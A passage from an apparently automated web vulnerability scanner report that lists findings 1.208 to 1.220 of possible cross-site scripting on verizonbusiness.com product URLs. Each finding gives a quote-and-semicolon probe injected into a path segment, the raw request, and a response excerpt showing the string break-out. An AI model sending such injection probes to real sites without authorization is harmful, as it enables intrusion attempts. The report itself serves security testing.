...[SNIP]...

1.208. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/program-management/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7840c"%3b247aa4cf98 was submitted in the REST URL parameter 3. This input was echoed as 7840c";247aa4cf98 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/program-management7840c"%3b247aa4cf98/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:30 GMT
Content-Type: text/html
Content-Length: 43688
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/program-management7840c";247aa4cf98/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.209. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/voice-messaging/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24949'%3b15adafaf5b9 was submitted in the REST URL parameter 1. This input was echoed as 24949';15adafaf5b9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products24949'%3b15adafaf5b9/mobility/voice-messaging/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Date: Wed, 17 Nov 2010 00:46:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products24949';15adafaf5b9/mobility/voice-messaging/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.210. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/voice-messaging/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3a86"%3b3cce78453f4 was submitted in the REST URL parameter 1. This input was echoed as c3a86";3cce78453f4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsc3a86"%3b3cce78453f4/mobility/voice-messaging/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsc3a86";3cce78453f4/mobility/voice-messaging/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.211. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/voice-messaging/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d26fe"%3bac4be014476 was submitted in the REST URL parameter 2. This input was echoed as d26fe";ac4be014476 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobilityd26fe"%3bac4be014476/voice-messaging/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobilityd26fe";ac4be014476/voice-messaging/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENT
...[SNIP]...

1.212. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/voice-messaging/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d58f'%3bd6918e1f5ed was submitted in the REST URL parameter 2. This input was echoed as 4d58f';d6918e1f5ed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility4d58f'%3bd6918e1f5ed/voice-messaging/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:34 GMT
Content-Type: text/html
Content-Length: 42333
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility4d58f';d6918e1f5ed/voice-messaging/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.213. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/voice-messaging/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f81dd"%3b7fbe73ab643 was submitted in the REST URL parameter 3. This input was echoed as f81dd";7fbe73ab643 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/voice-messagingf81dd"%3b7fbe73ab643/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:09 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/voice-messagingf81dd";7fbe73ab643/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.214. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/voice-messaging/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab08f'%3b7cb4ab0f46a was submitted in the REST URL parameter 3. This input was echoed as ab08f';7cb4ab0f46a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/voice-messagingab08f'%3b7cb4ab0f46a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:50 GMT
Content-Type: text/html
Content-Length: 43684
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/voice-messagingab08f';7cb4ab0f46a/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.215. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/wireless-devices/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32e7c'%3bfd9cfa37da7 was submitted in the REST URL parameter 1. This input was echoed as 32e7c';fd9cfa37da7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products32e7c'%3bfd9cfa37da7/mobility/wireless-devices/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:37 GMT
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products32e7c';fd9cfa37da7/mobility/wireless-devices/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.216. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/wireless-devices/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efe60"%3b03077da2f15 was submitted in the REST URL parameter 1. This input was echoed as efe60";03077da2f15 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsefe60"%3b03077da2f15/mobility/wireless-devices/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:23 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsefe60";03077da2f15/mobility/wireless-devices/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIM
...[SNIP]...

1.217. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/wireless-devices/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c40cd'%3b9862982ca56 was submitted in the REST URL parameter 2. This input was echoed as c40cd';9862982ca56 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobilityc40cd'%3b9862982ca56/wireless-devices/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:09 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42335
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobilityc40cd';9862982ca56/wireless-devices/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.218. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/wireless-devices/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39ccf"%3bd4482b29410 was submitted in the REST URL parameter 2. This input was echoed as 39ccf";d4482b29410 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility39ccf"%3bd4482b29410/wireless-devices/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:43 GMT
Content-Type: text/html
Content-Length: 42335
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility39ccf";d4482b29410/wireless-devices/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.219. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/wireless-devices/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 822cc"%3b9f41d42046d was submitted in the REST URL parameter 3. This input was echoed as 822cc";9f41d42046d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/wireless-devices822cc"%3b9f41d42046d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43686
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
bx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/wireless-devices822cc";9f41d42046d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.220. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/wireless-devices/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9615'%3b2d9eec93f80 was submitted in the REST URL parameter 3. This input was echoed as d9615';2d9eec93f80 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/wireless-devicesd9615'%3b2d9eec93f80/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
